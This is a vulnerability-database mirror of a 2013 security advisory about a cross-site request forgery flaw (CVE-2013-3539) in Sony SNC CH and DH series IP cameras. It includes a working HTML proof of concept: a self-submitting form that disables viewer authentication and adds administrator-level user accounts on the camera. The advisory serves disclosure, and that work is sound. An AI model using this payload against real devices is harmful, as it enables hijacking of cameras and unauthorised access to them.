Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJonas Rapero CastilloPACKETSTORM:122006
HistoryJun 13, 2013 - 12:00 a.m.

Sony CH / DH Cross Site Request Forgery

2013-06-1300:00:00
Jonas Rapero Castillo
packetstormsecurity.com
25

0.002 Low

EPSS

Percentile

52.4%

JSON
`===========================================================================  
SONY  
====================================================================  
===========================================================================  
  
1.Advisory Information  
Title: Sony CH, DH Series Vulnerability  
Date Published: 12/06/2013  
Date of last updated: 12/06/2013  
  
2.Vulnerability Description  
We have been found the next vulnerability in this devices  
-CVE-2013-3539. Cross Site Request Forgery(CWE-352)  
  
3.Affected Products  
CVE-2013-3539, the following product are affected SNC CH140, SNC CH180, SNC CH240, SNC CH280, SNC DH140, SNC DH140T, SNC DH180, SNC DH240, SNC DH240T and SNC DH280.  
ItΒ’s possible others models are affected but they were not checked.  
  
4.PoC  
4.1.Cross Site Request Forgery (CSRF)  
CVE-2013-3539, CSRF via POST method. Targeted attack to any administrator.  
These cameras use a web interface which is prone to CSRF vulnerabilities.   
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.  
This is our .html attack.  
_____________________________________________________________________________  
<html>  
<body>  
<form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">  
<input type="Select" name="ViewerModeDefault" value="00000fff">  
<input type="Hidden" name="ViewerAuthen" value="off">  
<input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">  
<input type="Hidden" name="User1" value="xxxx,c0000fff">  
<input type="Hidden" name="User2" value="xxxx,c0000fff">  
<input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">  
<input type="Hidden" name="User4" value="Og==,00000fff">  
<input type="Hidden" name="User5" value="Og==,00000fff">  
<input type="Hidden" name="User6" value="Og==,00000fff">  
<input type="Hidden" name="User7" value="Og==,00000fff">  
<input type="Hidden" name="User8" value="Og==,00000fff">  
<input type="Hidden" name="User9" value="Og==,00000fff">  
<input type="Hidden" name="Reload" value="referer">  
<script>document.SonyCsRf.submit();</script>  
</form>  
</body>  
</html>  
_____________________________________________________________________________  
Now we can check that we have a new user in the configuration.  
  
5.Credits  
CVE-2013-3539 was discovered by JonΓ‘s Ropero Castillo. .  
  
6.Report Timeline  
-2013-05-25: Students team notifies the Sony Customer Support of the vulnerability. No reply received.  
`

Related

cvelist 2
prion 2
packetstorm 1
nvd 2
cve 2
zdt 1
cvelist
cvelist
CVE-2013-3539
2022-10-03 16:14:46
CVE-2013-3964
2022-10-03 16:14:46
prion
prion
Cross site request forgery (csrf)
2013-10-01 19:55:00
Cross site scripting
2013-10-01 19:55:00
packetstorm
packetstorm
Samsung Series Cross Site Scripting
2013-06-13 00:00:00
nvd
nvd
CVE-2013-3964
2013-10-01 19:55:09
CVE-2013-3539
2013-10-01 19:55:03
cve
cve
CVE-2013-3539
2022-10-03 16:14:46
CVE-2013-3964
2022-10-03 16:14:46
zdt
zdt
Sony CH / DH Cross Site Request Forgery Vulnerability
2013-06-14 00:00:00

0.002 Low

EPSS

Percentile

52.4%

JSON
Related for PACKETSTORM:122006
cvelist2prion2packetstorm1nvd2cve2zdt1